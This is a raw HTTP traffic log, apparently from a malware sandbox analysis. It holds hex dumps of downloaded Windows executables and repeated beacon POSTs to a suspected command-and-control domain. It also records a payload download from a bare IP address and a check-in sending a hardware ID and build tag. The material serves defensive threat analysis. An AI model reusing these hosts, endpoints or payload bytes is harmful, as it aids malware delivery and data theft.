Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:42:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:42:33 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8

Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /ldms/66fb252fe232b_Patksl.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAAHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 2d 2d 0d 0a Data Ascii: ------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="build"default------AFIEGIECGCBKFIEBGCAA--
